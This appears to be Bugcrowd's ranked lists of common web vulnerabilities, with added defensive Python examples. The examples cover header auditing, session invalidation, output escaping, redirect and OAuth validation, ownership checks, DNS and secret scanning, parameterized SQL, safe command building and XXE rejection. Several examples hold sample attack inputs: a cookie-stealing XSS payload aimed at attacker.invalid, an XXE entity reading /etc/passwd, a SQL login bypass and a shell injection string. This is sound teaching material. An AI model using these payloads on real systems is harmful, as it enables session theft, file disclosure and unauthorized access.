Updated January 2025

Top 10 Vulnerabilities

Bugcrowd tracks the global vulnerability landscape based on the hundreds of thousands of vulnerability reports our platform processes annually—providing critical data for customers and hackers in reports, benchmarks, and recommendations.

For more insight about the vulnerability rankings below, see our annual Inside the Platform: Bugcrowd Vulnerability Trends report.

1. Reflected cross-site scripting (XSS)

Reflected XSS occurs when an application echoes attacker-controlled input from the request (for example a URL parameter) into its response without encoding it for the output context. The injected script runs in the victim's browser when they open a crafted link; nothing is stored on the server, so each victim has to be lured individually.

2. Disclosure of secrets

This can occur when a website or app doesn't properly protect deployment secrets, API tokens, PII, intellectual property, and other sensitive information, leaving it readable in responses, source files, error pages, or public repositories.

3. Insecure direct object reference (IDOR)

IDOR is present when an application exposes a reference to an internal object (such as a record ID in a URL or form field) and fails to check that the requesting user is authorized to access that object, so simply changing the reference returns another user's data.

4. Lack of security headers

This refers to the absence of security headers such as Strict-Transport-Security (HSTS), Cache-Control, and Content-Security-Policy, which leaves web apps exposed to, respectively, plain-HTTP downgrades, caching of sensitive responses, and unmitigated script injection.

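
The audit below is an added example, not code from the page: it checks a response header map for an authenticated HTML page against a small baseline and reports what is missing or weak. The one-year HSTS threshold and the two sample responses are assumptions.

```python
import re

# Added example: audit a response header map against a baseline for an
# authenticated HTML page. The one-year HSTS threshold is an assumption.
HSTS_MIN_MAX_AGE = 31536000  # seconds


def _get(headers, name):
    """Case-insensitive header lookup; None when the header is absent."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return None


def _csp_directives(csp):
    """Parse "a b c; d e" into {"a": ["b", "c"], "d": ["e"]}."""
    directives = {}
    for part in csp.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    return directives


def audit_security_headers(headers):
    """Return a list of findings; an empty list means the baseline passed."""
    findings = []

    hsts = _get(headers, "Strict-Transport-Security")
    if not hsts:
        findings.append("HSTS missing: browsers will follow plain-HTTP downgrades")
    else:
        match = re.search(r"max-age=(\d+)", hsts, re.IGNORECASE)
        if not match or int(match.group(1)) < HSTS_MIN_MAX_AGE:
            findings.append("HSTS max-age below one year")
        if "includesubdomains" not in hsts.lower():
            findings.append("HSTS lacks includeSubDomains: subdomains stay downgradable")

    csp = _get(headers, "Content-Security-Policy")
    directives = _csp_directives(csp) if csp else {}
    if not csp:
        findings.append("CSP missing: no browser-side mitigation for injected scripts")
    else:
        script_src = directives.get("script-src", directives.get("default-src", []))
        # Browsers ignore 'unsafe-inline' once a nonce or hash is present, so
        # only flag it when it is the sole thing permitting inline scripts.
        has_nonce_or_hash = any(t.startswith(("'nonce-", "'sha")) for t in script_src)
        if "'unsafe-inline'" in script_src and not has_nonce_or_hash:
            findings.append("CSP script-src allows 'unsafe-inline' without nonce or hash")

    if "frame-ancestors" not in directives and not _get(headers, "X-Frame-Options"):
        findings.append("No frame-ancestors or X-Frame-Options: page can be framed (clickjacking)")

    xcto = _get(headers, "X-Content-Type-Options")
    if not xcto or xcto.strip().lower() != "nosniff":
        findings.append("X-Content-Type-Options: nosniff missing: MIME sniffing possible")

    cache = _get(headers, "Cache-Control")
    if not cache or "no-store" not in cache.lower():
        findings.append("Cache-Control lacks no-store: authenticated content may be cached")

    return findings


# Constructed sample responses (not from the page).
WEAK_RESPONSE = {
    "Content-Type": "text/html; charset=utf-8",
    "Strict-Transport-Security": "max-age=300",
    "Cache-Control": "public, max-age=3600",
}

HARDENED_RESPONSE = {
    "Content-Type": "text/html; charset=utf-8",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains; preload",
    "Content-Security-Policy": "default-src 'self'; script-src 'self' 'nonce-r4nd0m'; "
                               "object-src 'none'; frame-ancestors 'none'",
    "X-Content-Type-Options": "nosniff",
    "Cache-Control": "no-store",
}

if __name__ == "__main__":
    for label, response in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit_security_headers(response) or ["no findings"])
```

Run against captured headers from a real response (for example the dict from `requests.get(...).headers`) to get the same report; the weak sample above produces six findings and the hardened one none.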
5. Failure to invalidate session

If the application does not invalidate existing sessions when a password is changed (or reset), an attacker who has already obtained a session can keep using it even after the legitimate user has rotated the compromised credential.

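
The store below is an added example, not Bugcrowd's code, showing the bug and one fix. The fix used here (a per-user auth_version that every session is pinned to, bumped on credential change) is an assumption about the implementation; the page only names the failure mode.

```python
import secrets


class SessionStore:
    """In-memory session store (added example). Each user carries an
    auth_version; a session is valid only while the version it was issued
    under still matches, so a password change invalidates every session
    except the fresh one handed back to the requester."""

    def __init__(self):
        self._sessions = {}       # token -> {"user": str, "auth_version": int}
        self._auth_version = {}   # user -> int, bumped on credential change
        self._password_hash = {}  # user -> stored hash (opaque in this demo)

    def register(self, user, password_hash):
        self._password_hash[user] = password_hash
        self._auth_version[user] = 0

    def login(self, user):
        """Issue a session bound to the user's current auth_version.
        Password verification before this call is assumed."""
        token = secrets.token_urlsafe(32)
        self._sessions[token] = {"user": user, "auth_version": self._auth_version[user]}
        return token

    def current_user(self, token):
        """Resolve a token to a user, or None if unknown or stale."""
        session = self._sessions.get(token)
        if session is None:
            return None
        if session["auth_version"] != self._auth_version[session["user"]]:
            del self._sessions[token]   # issued before the last credential change
            return None
        return session["user"]

    def change_password_vulnerable(self, token, new_password_hash):
        """The bug: the hash is replaced but every existing session keeps working."""
        user = self.current_user(token)
        if user is None:
            raise PermissionError("not authenticated")
        self._password_hash[user] = new_password_hash

    def change_password(self, token, new_password_hash):
        """The fix: bump auth_version so every outstanding session becomes
        stale, then issue one fresh session to the caller."""
        user = self.current_user(token)
        if user is None:
            raise PermissionError("not authenticated")
        self._password_hash[user] = new_password_hash
        self._auth_version[user] += 1
        del self._sessions[token]
        return self.login(user)


def scenario(fixed):
    """Victim and attacker both hold sessions; the victim changes the password.
    Returns (attacker_valid_before, attacker_valid_after, victim_valid_after)."""
    store = SessionStore()
    store.register("alice", "hash-v1")
    victim = store.login("alice")
    attacker = store.login("alice")      # stolen or replayed session
    before = store.current_user(attacker) == "alice"
    if fixed:
        victim = store.change_password(victim, "hash-v2")
    else:
        store.change_password_vulnerable(victim, "hash-v2")
    return (before,
            store.current_user(attacker) == "alice",
            store.current_user(victim) == "alice")


if __name__ == "__main__":
    print("vulnerable:", scenario(fixed=False))   # attacker keeps access
    print("fixed:     ", scenario(fixed=True))    # attacker session is stale
```

The version counter works equally for stateless tokens: embed the version in the token and compare it on every request, which also covers the other events that should end sessions (MFA reset, role change, account lock).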
6. Stored XSS

Stored (persistent) XSS arises when an application saves data from an untrusted source, such as a comment or profile field, and later renders it into pages served to other users without encoding it, so the injected script executes in every victim's browser session.

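
The renderer below is an added example covering both the reflected XSS entry and this stored XSS entry; it is not code from the page. The payloads and the comment list are constructed, and the escaping rules shown (text, attribute, and URL contexts) are the standard ones rather than anything the page prescribes.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed payloads for the demo (not from the page).
REFLECTED_PAYLOAD = '<script>new Image().src="https://attacker.invalid/?c="+document.cookie</script>'
ATTRIBUTE_PAYLOAD = '" autofocus onfocus="alert(1)'
URL_PAYLOAD = "javascript:alert(document.domain)"
STORED_COMMENTS = [  # what a persistence layer would hand back to the renderer
    {"author": "bob", "body": "Looks good to me"},
    {"author": "mallory", "body": "<img src=x onerror=alert(document.cookie)>"},
]


def render_search_vulnerable(query):
    """Reflected XSS: the query parameter is echoed into HTML verbatim."""
    return f'<p>Results for {query}</p><input name="q" value="{query}">'


def render_search_safe(query):
    """Encode for the output context. quote=True also escapes quotes, so a
    payload cannot close the value attribute and add an event handler."""
    q = html.escape(query, quote=True)
    return f'<p>Results for {q}</p><input name="q" value="{q}">'


def safe_href(url):
    """URL context: HTML-escaping does not neutralise a javascript: URL, so
    allow only http(s) and relative links; everything else degrades to '#'."""
    cleaned = re.sub(r"[\x00-\x1f\x7f]", "", url).strip()  # browsers drop these in schemes
    scheme = urlsplit(cleaned).scheme.lower()
    if scheme not in ("", "http", "https"):
        return "#"
    return html.escape(cleaned, quote=True)


def render_comments_vulnerable(comments):
    """Stored XSS: persisted untrusted content is rendered without encoding,
    so the payload fires for every visitor, not just the one who submitted it."""
    return "".join(f"<li><b>{c['author']}</b>: {c['body']}</li>" for c in comments)


def render_comments_safe(comments):
    """Same data, encoded at render time (the right place; input filters are bypassable)."""
    return "".join(
        f"<li><b>{html.escape(c['author'])}</b>: {html.escape(c['body'])}</li>"
        for c in comments
    )


if __name__ == "__main__":
    print(render_search_vulnerable(ATTRIBUTE_PAYLOAD))
    print(render_search_safe(ATTRIBUTE_PAYLOAD))
    print(render_comments_safe(STORED_COMMENTS))
    print(safe_href(URL_PAYLOAD))
```

Escaping is per context: the text and attribute cases are handled by `html.escape`, but a `javascript:` URL survives escaping untouched, which is why `safe_href` checks the scheme instead. A template engine with auto-escaping does the first two for you; the URL check still has to be yours.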
7. Content spoofing

When an app reflects user-supplied data into a page without treating it as untrusted, an attacker can supply their own content (typically via a parameter value) that is displayed to other users as if it came from the site, for example a convincing phishing message under the trusted domain.

8. Open redirect

This is present when an application redirects to a destination taken from user-controllable input (such as a next or returnUrl parameter) without validating it, letting an attacker send users to malicious websites from a link that begins with the trusted domain.

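
The validator below is an added example, not code from the page. It accepts a redirect target only if it is a plain absolute path or points at an allow-listed host, and it handles the usual filter bypasses (protocol-relative `//host`, backslashes, encoded slashes, `user@host`, control characters, non-http schemes). The allowed host is an assumption.

```python
import re
from urllib.parse import unquote, urlsplit

ALLOWED_HOSTS = {"app.example.com"}   # assumed list of hosts we may redirect to


def safe_redirect_target(target, allowed_hosts=ALLOWED_HOSTS, fallback="/"):
    """Return target if it is safe to redirect to, otherwise fallback.
    Added example; the bypass handling mirrors browser URL parsing quirks."""
    if not target:
        return fallback
    # Drop control characters browsers ignore, then treat backslash as slash
    # the way browsers do, so "/\\evil.example" is seen as "//evil.example".
    cleaned = re.sub(r"[\x00-\x1f\x7f]", "", target).strip().replace("\\", "/")
    decoded = unquote(cleaned)            # validate the form a browser would act on
    parts = urlsplit(decoded)

    if not parts.scheme and not parts.netloc:
        # Relative target: accept only an absolute path, never a "//host" form.
        if decoded.startswith("/") and not decoded.startswith("//"):
            return cleaned
        return fallback

    if parts.scheme.lower() not in ("http", "https"):
        return fallback                   # javascript:, data:, etc.
    if parts.username or parts.password:
        return fallback                   # "https://trusted@evil.example/" forms
    if parts.hostname is None or parts.hostname not in allowed_hosts:
        return fallback                   # exact host match, so no suffix tricks
    return cleaned


if __name__ == "__main__":
    for candidate in ("/account", "//evil.example", "/\\evil.example",
                      "https://app.example.com.evil.example/", "https://app.example.com@evil.example/",
                      "javascript:alert(1)", "/%2F%2Fevil.example", "https://app.example.com/orders"):
        print(f"{candidate!r:45} -> {safe_redirect_target(candidate)!r}")
```

Where no cross-host redirect is needed at all, the simplest fix is stricter still: store the post-login destination server-side keyed by an opaque id and never accept a URL from the client.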
9. Directory listing enabled

Web servers with directory listing enabled let attackers enumerate the files in a given path for reconnaissance, which can expose backups, configuration files, or other resources that were never meant to be linked.

10. Misconfigured DNS

This is present when DNS records are configured incorrectly, for example a CNAME or NS record left pointing at a decommissioned host or an unclaimed third-party service, creating the risk of an unauthorized takeover of DNS-dependent services such as email, website hosting, and more.

1. Disclosure of secrets

This can occur when a website or application doesn't properly protect deployment secrets, API tokens, PII, intellectual property, and other sensitive information, leaving it readable in responses, source files, error pages, or public repositories.

2. Authentication bypass

This vulnerability is present when an attacker can circumvent the application's authentication, for example through a flawed login flow, weak token validation, or an unprotected route, in order to access restricted resources or gain unauthorized control.

3. Insecure direct object reference (IDOR)

IDOR is present when an application exposes a reference to an internal object (such as a record ID in a URL or form field) and fails to check that the requesting user is authorized to access that object, so simply changing the reference returns another user's data.

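
The lookup below is an added example for the IDOR entries above, not code from the page. The invoice data, users and roles are constructed; the point is that the fix checks the object's owner, not that the id is hard to guess.

```python
# Added example: an invoice lookup with and without an ownership check.
# The data, users and roles are constructed for the demo.
INVOICES = {
    1001: {"owner": "alice", "total": 120.00, "pdf": "inv-1001.pdf"},
    1002: {"owner": "bob", "total": 980.50, "pdf": "inv-1002.pdf"},
}
ROLES = {"alice": "customer", "bob": "customer", "carol": "finance"}


class NotFound(Exception):
    """Used for both 'does not exist' and 'not yours', so the response does
    not confirm which ids exist (keeps enumeration uninformative)."""


def get_invoice_vulnerable(current_user, invoice_id):
    """IDOR: authentication happened (current_user is known) but authorization
    did not, so any logged-in user reads any invoice by changing the id."""
    return INVOICES.get(invoice_id)


def get_invoice(current_user, invoice_id):
    """Fixed: resolve the object, then check that the caller may access it.
    Random or unguessable ids are not a substitute for this check; they only
    slow enumeration down."""
    invoice = INVOICES.get(invoice_id)
    if invoice is None:
        raise NotFound(invoice_id)
    is_owner = invoice["owner"] == current_user
    is_finance = ROLES.get(current_user) == "finance"
    if not (is_owner or is_finance):
        raise NotFound(invoice_id)       # same error as a missing record
    return invoice


def can_read(current_user, invoice_id):
    """True/False wrapper around get_invoice for callers that do not want exceptions."""
    try:
        get_invoice(current_user, invoice_id)
        return True
    except NotFound:
        return False


if __name__ == "__main__":
    print("vulnerable, alice reads bob's invoice:", get_invoice_vulnerable("alice", 1002))
    print("fixed, alice reads bob's invoice:     ", can_read("alice", 1002))
    print("fixed, finance reads bob's invoice:   ", can_read("carol", 1002))
```

With a database the same check is usually pushed into the query (`WHERE id = ? AND owner = ?`) so that a missing ownership clause is impossible to forget on one code path.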
4. Remote code execution (RCE)

With RCE, an attacker can run arbitrary code on a target system remotely due to unvalidated user inputs, insecure APIs, misconfigurations, or other flaws.

5. SQL injection

This refers to when user input is concatenated into a SQL query so that an attacker can alter the query's structure in order to access, modify, or delete data, bypass authentication, or execute administrative commands on the database.

6. OAuth misconfiguration

An application that improperly implements or configures OAuth (and OpenID Connect, which layers authentication on top of it) can create security vulnerabilities, such as leaking authorization codes or tokens through a loosely validated redirect_uri, or accepting callbacks without a state check.

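
The snippet below is an added example, not code from the page. It contrasts prefix matching of redirect_uri (a common misconfiguration) with exact matching, and shows the client-side state check on the authorization-code callback. The client id, registered URI and URLs are assumptions.

```python
import secrets
from urllib.parse import parse_qs, urlsplit

# Added example. The client registration and URLs are constructed.
REGISTERED_REDIRECT_URIS = {
    "client-123": {"https://app.example.com/cb"},
}


def redirect_uri_allowed_weak(client_id, requested):
    """Misconfiguration: accept any redirect_uri that starts with the
    registered URI's origin, so the attacker only needs a host that begins
    with the trusted one (app.example.com.attacker.invalid, or user@host)."""
    for uri in REGISTERED_REDIRECT_URIS[client_id]:
        origin = "{0.scheme}://{0.netloc}".format(urlsplit(uri))
        if requested.startswith(origin):
            return True
    return False


def redirect_uri_allowed(client_id, requested):
    """Exact string comparison against the registered set: no prefix,
    wildcard or substring matching, and no extra query or fragment."""
    return requested in REGISTERED_REDIRECT_URIS[client_id]


class AuthorizationFlow:
    """Client side of the authorization-code flow, showing the state check
    that stops an attacker from completing the flow in the victim's browser."""

    def __init__(self, client_id):
        self.client_id = client_id
        self._pending = {}   # session_id -> state

    def start(self, session_id):
        state = secrets.token_urlsafe(24)
        self._pending[session_id] = state
        return state     # goes out as the ?state= parameter of the authorization request

    def handle_callback(self, session_id, callback_url):
        """Return the authorization code only if state matches the one this
        session started with; a missing, reused or foreign state is rejected."""
        params = parse_qs(urlsplit(callback_url).query)
        expected = self._pending.pop(session_id, None)    # single use
        received = params.get("state", [None])[0]
        if expected is None or received is None or not secrets.compare_digest(expected, received):
            raise PermissionError("state mismatch: possible CSRF / code injection")
        return params.get("code", [None])[0]


def state_scenario():
    """Legitimate callback succeeds; a forged callback for the same session fails."""
    flow = AuthorizationFlow("client-123")
    state = flow.start("victim-session")
    legit = flow.handle_callback("victim-session", f"https://app.example.com/cb?code=abc&state={state}")
    flow.start("victim-session")
    try:
        flow.handle_callback("victim-session", "https://app.example.com/cb?code=attacker-code&state=forged")
        forged_rejected = False
    except PermissionError:
        forged_rejected = True
    return legit, forged_rejected


if __name__ == "__main__":
    evil = "https://app.example.com.attacker.invalid/cb"
    print("weak accepts attacker host:  ", redirect_uri_allowed_weak("client-123", evil))
    print("strict accepts attacker host:", redirect_uri_allowed("client-123", evil))
    print("state check (legit code, forged rejected):", state_scenario())
```

On the authorization-server side the same exact-match rule applies to the redirect_uri in both the authorization and token requests; public clients should additionally use PKCE so an intercepted code cannot be exchanged.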
7. Stored XSS

Stored (persistent) XSS arises when an application saves data from an untrusted source, such as a comment or profile field, and later renders it into pages served to other users without encoding it, so the injected script executes in every victim's browser session.

8. File inclusion

A file inclusion flaw is present if an app includes files on the server based on user input, typically by manipulating file paths in URLs or form fields. Local file inclusion exposes files already on the server; where the app also accepts remote URLs, it can lead to code execution.

9. DNS with critical impact

This refers to a DNS flaw whose exploitation or disruption would make the application unreachable, leading to lost revenue and/or severe reputational damage.

10. Misconfigured DNS

This is present when DNS records are configured incorrectly, for example a CNAME or NS record left pointing at a decommissioned host or an unclaimed third-party service, creating the risk of an unauthorized takeover of DNS-dependent services such as email, website hosting, and more.

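
The checker below is an added example for the misconfigured DNS entries, not code from the page. It runs over a constructed zone with a simulated resolver table (a real check would issue DNS queries instead) and flags dangling CNAME/NS/MX targets plus mail domains without SPF or DMARC records.

```python
# Added example: find dangling delegations and unprotected mail domains in a
# zone. The zone and the "what resolves" table are constructed; a real check
# would query DNS (for example with dnspython) in place of the lookup dict.
ZONE = [
    # (owner name, type, target/value)
    ("www.example.com.",      "CNAME", "example-prod.cdn-provider.invalid."),
    ("old-blog.example.com.", "CNAME", "blog-1234.hosting-provider.invalid."),
    ("example.com.",          "MX",    "mail.example.com."),
    ("example.com.",          "NS",    "ns1.example.com."),
    ("example.com.",          "NS",    "ns-old.decommissioned.invalid."),
    ("example.com.",          "TXT",   "v=spf1 include:_spf.mail-provider.invalid -all"),
    ("shop.example.com.",     "MX",    "mx.shop-platform.invalid."),
]

# Simulated answers: name -> set of record types it currently resolves to;
# a name missing from the table stands for NXDOMAIN.
RESOLVES = {
    "example-prod.cdn-provider.invalid.": {"A"},
    "mail.example.com.": {"A"},
    "ns1.example.com.": {"A"},
    "mx.shop-platform.invalid.": {"A"},
}


def find_dns_issues(zone, resolves):
    """Return [(owner, type, description)] for records that invite takeover
    or spoofing. Dangling targets are listed first, in zone order."""
    findings = []
    for owner, rtype, target in zone:
        if rtype in ("CNAME", "NS", "MX") and target not in resolves:
            findings.append((owner, rtype,
                             f"dangling {rtype} -> {target} (NXDOMAIN; takeover candidate)"))

    # Any domain that receives mail (has MX) should publish SPF and DMARC;
    # without them anyone can send mail that claims to come from it.
    mail_domains = {owner for owner, rtype, _ in zone if rtype == "MX"}
    for domain in sorted(mail_domains):
        txt = [v for o, t, v in zone if o == domain and t == "TXT"]
        if not any(v.startswith("v=spf1") for v in txt):
            findings.append((domain, "TXT", "no SPF record: others can send mail as this domain"))
        dmarc = [v for o, t, v in zone if o == "_dmarc." + domain and t == "TXT"]
        if not any(v.startswith("v=DMARC1") for v in dmarc):
            findings.append((domain, "TXT", "no DMARC record: SPF/DKIM failures are not enforced"))
    return findings


if __name__ == "__main__":
    for owner, rtype, description in find_dns_issues(ZONE, RESOLVES):
        print(f"{owner:24} {rtype:6} {description}")
```

A dangling CNAME is only exploitable when the target's provider lets anyone claim the unclaimed name, so in practice each finding is followed by a per-provider check; the dangling NS case is worse, since whoever controls the nameserver's domain answers for the delegated zone.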
1. Sensitive data—hardcoded

This refers to the practice of embedding sensitive information, such as passwords, encryption keys, or API keys, directly in application source code (or a shipped binary), where anyone with access to the code, a repository, or a decompiled build can easily find it.

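
The scanner below is an added example for this entry and for the "Disclosure of secrets" entries, not code from the page. It runs a few credential patterns plus a Shannon-entropy filter over a constructed source file; the patterns, the 4.0 bits-per-character threshold and the sample file are assumptions typical of such tools.

```python
import math
import re

# Added example: a small hardcoded-secret scanner. Patterns and the entropy
# threshold are assumptions typical of such tools, not from the page.
ENTROPY_THRESHOLD = 4.0   # bits per character; random API tokens land well above this

PATTERNS = [
    # (label, regex, apply entropy filter to the captured value)
    ("AWS access key ID", re.compile(r"\bAKIA[0-9A-Z]{16}\b"), False),
    ("Private key material", re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"), False),
    ("Hardcoded password",
     re.compile(r"""(?i)[a-z_]*pass(?:word|wd)?[a-z_]*\s*[:=]\s*["']([^"']+)["']"""), False),
    ("High-entropy credential",
     re.compile(r"""(?i)[a-z_]*(?:api_?key|secret|token)[a-z_]*\s*[:=]\s*["']([^"']{16,})["']"""), True),
]


def shannon_entropy(text):
    """Bits per character: a 28-char random token scores about 4.8, prose 3 to 3.5."""
    if not text:
        return 0.0
    counts = {ch: text.count(ch) for ch in set(text)}
    return -sum(c / len(text) * math.log2(c / len(text)) for c in counts.values())


def scan_source(source):
    """Return [(line_number, label, stripped line)] for every suspicious line."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for label, pattern, needs_entropy in PATTERNS:
            match = pattern.search(line)
            if not match:
                continue
            value = match.group(1) if match.groups() else match.group(0)
            if needs_entropy and shannon_entropy(value) < ENTROPY_THRESHOLD:
                continue    # reads like a name or placeholder, not a credential
            findings.append((lineno, label, line.strip()))
    return findings


# Constructed sample of what an offending file can look like. The AWS key is
# the placeholder value from AWS documentation; the other values are made up.
SAMPLE_SOURCE = '''\
import os

AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
db_password = "hunter2"
payment_api_token = "tok_9xQ2vL7pR4sT1uW8yZ3aB6cD"
session_token_name = "csrf_token_cookie_v2"
DEBUG = "false"
SIGNING_KEY = """-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA...
-----END RSA PRIVATE KEY-----"""

# the fix: read from the environment or a secret manager and fail closed if absent
API_TOKEN = os.environ["PAYMENT_API_TOKEN"]
'''

if __name__ == "__main__":
    for lineno, label, snippet in scan_source(SAMPLE_SOURCE):
        print(f"line {lineno:3}  {label:26} {snippet}")
```

Line 6 shows why the entropy filter exists: `csrf_token_cookie_v2` matches the keyword pattern but is a name, not a credential. Such a scanner belongs in a pre-commit hook and in CI; a secret that has already reached a repository has to be rotated, since removing it from the tip of history does not remove it from clones.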
2. Remote code execution (RCE)

With RCE, an attacker can run arbitrary code on a target system remotely due to unvalidated user inputs, insecure APIs, misconfigurations, or other flaws.

3. Second-factor authentication

A second-factor authentication (2FA) flaw, such as the ability to skip the second step entirely, brute-force or replay a one-time code, or insecurely stored 2FA secrets, can create a significant risk.

4. Content spoofing

When an app reflects user-supplied data into a page without treating it as untrusted, an attacker can supply ("spoof") their own content (typically via a parameter value) that is displayed to other users as if it came from the site, for example a convincing phishing message under the trusted domain.

5. Authentication bypass

This vulnerability is present when an attacker can circumvent the application's authentication, for example through a flawed login flow, weak token validation, or an unprotected route, in order to access restricted resources or gain unauthorized control.

6. SQL injection

This refers to when user input is concatenated into a SQL query so that an attacker can alter the query's structure in order to access, modify, or delete data, bypass authentication, or execute administrative commands on the database.

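
The login below is an added example for the SQL injection entries, not code from the page. It uses an in-memory SQLite database with constructed users to show the authentication bypass against a concatenated query, the parameterized version that is immune to it, and the one place parameters do not reach: identifiers such as an ORDER BY column. The sha256 hash stands in for a proper slow password hash.

```python
import hashlib
import sqlite3

# Added example. sha256 stands in for a real password hash (use a slow,
# salted KDF in production); the users are constructed.


def _hash(password):
    return hashlib.sha256(password.encode()).hexdigest()


def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password_hash TEXT)")
    for name, password in (("admin", "correct horse battery staple"), ("alice", "s3cret")):
        conn.execute("INSERT INTO users (username, password_hash) VALUES (?, ?)", (name, _hash(password)))
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """User input is spliced into the SQL text, so a quote in the username
    ends the literal and the rest of the input is parsed as SQL."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password_hash = '" + _hash(password) + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterized query: values travel separately from the SQL text, so
    attacker input is only ever compared, never parsed."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password_hash = ?",
        (username, _hash(password)),
    ).fetchone()
    return row[0] if row else None


ALLOWED_SORT_COLUMNS = {"username", "id"}


def sort_allowed(sort_by):
    return sort_by in ALLOWED_SORT_COLUMNS


def list_users(conn, sort_by):
    """Identifiers cannot be bound as parameters, so allow-list them instead
    of concatenating; this is where injection survives 'we use prepared statements'."""
    if not sort_allowed(sort_by):
        raise ValueError("unsupported sort column")
    return [row[0] for row in conn.execute(f"SELECT username FROM users ORDER BY {sort_by}")]


PAYLOAD = "admin' --"   # closes the literal and comments out the password clause

if __name__ == "__main__":
    db = setup_db()
    print("vulnerable:", login_vulnerable(db, PAYLOAD, "anything"))   # admin
    print("safe:      ", login_safe(db, PAYLOAD, "anything"))         # None
```

The resulting statement in the vulnerable path is `SELECT username FROM users WHERE username = 'admin' --' AND password_hash = '...'`, which is why the password never gets checked. The same rule applies to every other interpreter that takes a string (LDAP filters, NoSQL operators, OS commands): separate code from data, and allow-list anything that must be spliced into code.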
7. Command injection

Command injection occurs when an application passes user input into an operating-system command or shell, allowing an attacker to append shell metacharacters and execute arbitrary commands on the server.

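
The snippet below is an added example for this entry and for the RCE entries, not code from the page. It contrasts building a shell string from user input with building an argument list after validation, and shows shlex quoting for the case where a shell is unavoidable. A ping wrapper is the assumed feature; the hostname grammar is the usual RFC 1123 label rule.

```python
import ipaddress
import re
import shlex
import subprocess

# Added example: the vulnerable and fixed ways to build an OS command from
# user input. A "ping this host" feature is the assumed target.
HOSTNAME_RE = re.compile(
    r"(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*"
)


def build_ping_vulnerable(host):
    """Shell string with user input spliced in. Run with shell=True, /bin/sh
    parses it, so ; | && $( ) and backticks in host become new commands."""
    return f"ping -c 1 {host}"        # the later subprocess.run(cmd, shell=True) is the sink


def validate_host(host):
    """Accept only an IP literal or a syntactically valid hostname; anything
    else is rejected before it gets near a command."""
    try:
        ipaddress.ip_address(host)
        return host
    except ValueError:
        pass
    if HOSTNAME_RE.fullmatch(host):
        return host
    raise ValueError(f"invalid host: {host!r}")


def is_valid_host(host):
    try:
        validate_host(host)
        return True
    except ValueError:
        return False


def build_ping_safe(host):
    """argv list, no shell: each element is exactly one argument, whatever it
    contains. Validation still runs so a value such as '-f' cannot become a flag."""
    return ["ping", "-c", "1", validate_host(host)]


def quote_for_shell(host):
    """Second-best, for when a shell really is required: shlex.quote turns the
    whole value into one word, but input validation should still come first."""
    return "ping -c 1 " + shlex.quote(host)


def run_ping(host, timeout=5):
    """Execute the safe form (not called by the tests; needs a ping binary)."""
    return subprocess.run(build_ping_safe(host), capture_output=True, text=True, timeout=timeout)


if __name__ == "__main__":
    payload = "127.0.0.1; id"
    print("vulnerable string:", build_ping_vulnerable(payload))
    print("quoted string:    ", quote_for_shell(payload))
    print("safe argv:        ", build_ping_safe("example.com"))
    print("payload accepted?:", is_valid_host(payload))
```

The order of defences matters: validate against a positive grammar first, pass an argument list with no shell second, and reach for quoting only when a shell cannot be avoided. Encoding tricks and platform-specific shell syntax defeat blocklists of "dangerous characters", which is why none appears here.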
8. Disclosure of secrets

This arises when a website or application doesn't properly protect deployment secrets, API tokens, PII, intellectual property, and other sensitive information, leaving it readable in responses, source files, error pages, or public repositories.

9. XML external entity injection (XXE)

XXE refers to an attacker supplying XML that declares external entities, which a parser configured to resolve them will expand, allowing the attacker to read files on the server, make requests from the server to internal systems, or cause denial of service.

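
The parser front-end below is an added example, not code from the page. It shows what an XXE payload looks like and the standard mitigation of refusing any DTD, which removes the entity-declaration mechanism the attack depends on; it is written against Python's expat bindings, and the payload and documents are constructed.

```python
import xml.parsers.expat

# Added example: a parser front-end that refuses any DTD, which removes the
# mechanism XXE relies on (entity declarations). Payload is constructed.
XXE_PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE order [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<order><customer>&xxe;</customer></order>"""

CLEAN_DOCUMENT = """<?xml version="1.0"?>
<order><customer>Ada</customer><total>42.00</total></order>"""


class UnsafeXML(ValueError):
    """Raised as soon as a document tries to declare a DTD or an entity."""


def parse_untrusted_xml(data):
    """Parse XML into a flat list of (element, text) pairs. A vulnerable
    parser is one that both accepts the declaration and resolves the SYSTEM
    identifier; rejecting the DOCTYPE up front makes that impossible."""
    parser = xml.parsers.expat.ParserCreate()
    elements = []     # [name, text] in document order
    open_indexes = [] # stack of indexes into elements

    def start_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML(f"DTD not allowed (DOCTYPE {name})")

    def entity_decl(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeXML(f"entity declaration not allowed ({name} -> {sysid})")

    def start(name, attrs):
        open_indexes.append(len(elements))
        elements.append([name, ""])

    def end(name):
        open_indexes.pop()

    def text(chunk):
        if open_indexes:
            elements[open_indexes[-1]][1] += chunk

    parser.StartDoctypeDeclHandler = start_doctype
    parser.EntityDeclHandler = entity_decl
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = text
    parser.Parse(data, True)   # a handler exception aborts the parse here
    return [(name, value.strip()) for name, value in elements]


def is_rejected(data):
    try:
        parse_untrusted_xml(data)
        return False
    except UnsafeXML:
        return True


if __name__ == "__main__":
    print("clean:", parse_untrusted_xml(CLEAN_DOCUMENT))
    print("xxe payload rejected:", is_rejected(XXE_PAYLOAD))
```

Rejecting the DOCTYPE also stops the internal-entity "billion laughs" expansion. If a schema genuinely requires a DTD, the fallback is a parser configured to disallow only external entities and external DTD loading, with a resolver that refuses every SYSTEM identifier.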
